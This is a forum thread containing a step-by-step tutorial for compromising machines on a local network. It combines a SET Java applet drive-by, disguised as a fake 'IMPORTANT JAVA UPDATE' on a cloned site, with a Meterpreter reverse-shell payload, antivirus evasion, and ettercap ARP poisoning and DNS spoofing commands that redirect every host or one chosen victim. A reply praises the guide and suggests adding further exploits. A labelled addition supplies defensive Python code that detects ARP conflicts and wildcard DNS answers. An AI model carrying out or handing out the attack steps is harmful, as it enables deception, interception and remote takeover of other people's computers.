Thread: SET + ettercap

  1. #1
    Just burned his ISO
    Join Date
    Apr 2011

    SET + ettercap

    How to get into local machines using SET + ETTERCAP

    I don't know if this is right here in the Expert Section, but I don't think this fits into General Topics and I can't directly post into the Howtos section.
    This Howto describes how you can use SET + ettercap (dns_spoof plugin) together in a good way.

    Step 1: Setting up the Fake-Page

    a. Start SET

    b. Choose Website Attack Vectors by typing 1

    c. Choose Java Applet Attack

    d. Here choose Custom Import, so you can use this script to clone the site in which you want to inject the DriveBy,
    so that you can edit the content of the cloned page before SET makes evil stuff with it :P. I cloned for example, and after cloning I edited the index.html by changing the JAVA + YOU, DOWNLOAD TODAY part to something like IMPORTANT JAVA UPDATE. You don't have to use this option; you can simply use the Site-Cloner from SET, too.

    e. After choosing your site, you have to choose the Payload. I recommend choice 2 (Windows Reverse_TCP Meterpreter) in here, or if you know that your target has a 64 bit operating system, choose 5 (Windows Reverse_TCP Meterpreter x64), because the x64 one is completely FUD.

    f. Now you have to choose the encryption of the Payload, so that it won't get detected by the victim's AV. Just choose 16 (Backdoored Executable), which is currently the best.

    g. Now SET is setting up a Metasploit-Listener, which will show you if someone clicked on your Java DriveBy. You MUST keep this window open.

    Step 2: Use ettercap to redirect slave/s to your fake-site

    a. The first thing you have to do is open the etter.dns file, which is located in /usr/share/ettercap. Just delete everything in it, and if you want to redirect every site your slave visits, write the following into it:

    * A yourip

    If you only want to redirect one page, write this:

    thesiteyouwanttoredirect A yourip

    So in my specific case, the etter.dns file looks like this (everything gets redirected to my fake page):

    * A

    b. Running ettercap

    After configuring everything, you can now run the following command:

    ettercap -T -q -P dns_spoof -M ARP // //

    This poisons the whole local network, which means that every PC in your local machine gets redirected to your fake-page.
    If you want to redirect only one single PC, you have to run this command:

    ettercap -T -q -P dns_spoof -M ARP /ipofyourvictim/ //

    And here is what the parameters actually mean:
    -T means Text Interface, so you get no annoying GUI
    -q means silent mode, ettercap doesn't display everything it does (which would be really annoying)
    -P means ettercap has to use the dns_spoof plugin, which is responsible for the redirecting
    -M ARP means Man In The Middle Attack, the whole traffic into your network goes first through your PC

    So that's it, I hope you like my tutorial, and if you do so, please comment on it. If you got any questions, feel free to ask me!

    Tutorial by Fiddl aka Jodokus
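
Added example (not part of the original post, and not code from SET or ettercap): a defender-side check for the two traces the setup above leaves on a LAN, one MAC address claimed by several IPs (ARP poisoning) and one private IP answering for many unrelated names (the `* A` wildcard in etter.dns). The `arp -an` text, the DNS log pairs, the function names and the threshold of three names are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample: `arp -an` output on a host while the LAN is ARP-poisoned.
# The gateway (.1) and another host (.23) both claim the same MAC address.
SAMPLE_ARP = """\
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.23) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.40) at 66:77:88:99:aa:bb [ether] on eth0
? (192.168.1.41) at <incomplete> on eth0
"""

# Constructed sample: (query name, A record) pairs taken from a resolver log.
SAMPLE_DNS = [
    ("www.example.com", "192.168.1.23"),
    ("mail.example.org", "192.168.1.23"),
    ("update.example.net", "192.168.1.23"),
    ("printer.lan", "192.168.1.40"),
]

ARP_LINE = re.compile(
    r"\((?P<ip>[\d.]+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I)

def arp_conflicts(arp_output):
    """Return {mac: [ips]} for every MAC address claimed by more than one IP."""
    by_mac = defaultdict(set)
    for m in ARP_LINE.finditer(arp_output):
        by_mac[m["mac"].lower()].add(m["ip"])
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def wildcard_dns_targets(answers, min_names=3):
    """Return {ip: [names]} for private IPs that answer for many unrelated names."""
    by_ip = defaultdict(set)
    for name, ip in answers:
        if ipaddress.ip_address(ip).is_private:
            by_ip[ip].add(name.lower().rstrip("."))
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) >= min_names}

def correlate(arp_output, answers):
    """IPs flagged by both checks: sharing a MAC and answering wildcard DNS."""
    shared = {ip for ips in arp_conflicts(arp_output).values() for ip in ips}
    return sorted(shared & set(wildcard_dns_targets(answers)))

if __name__ == "__main__":
    print(arp_conflicts(SAMPLE_ARP))
    print(wildcard_dns_targets(SAMPLE_DNS))
    print(correlate(SAMPLE_ARP, SAMPLE_DNS))
```

Proxy ARP, captive portals and split-horizon DNS can trigger either check on their own, so the correlated result is the one worth alerting on.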

  2. #2
    Just burned their ISO
    Join Date
    Sep 2011

    AW: SET + ettercap

    I was writing a similar tutorial, now I can cancel that, your tutorial is perfect =). Probably you could mention the VNCINJECT or some mfsexploits in use with dnsspoofing
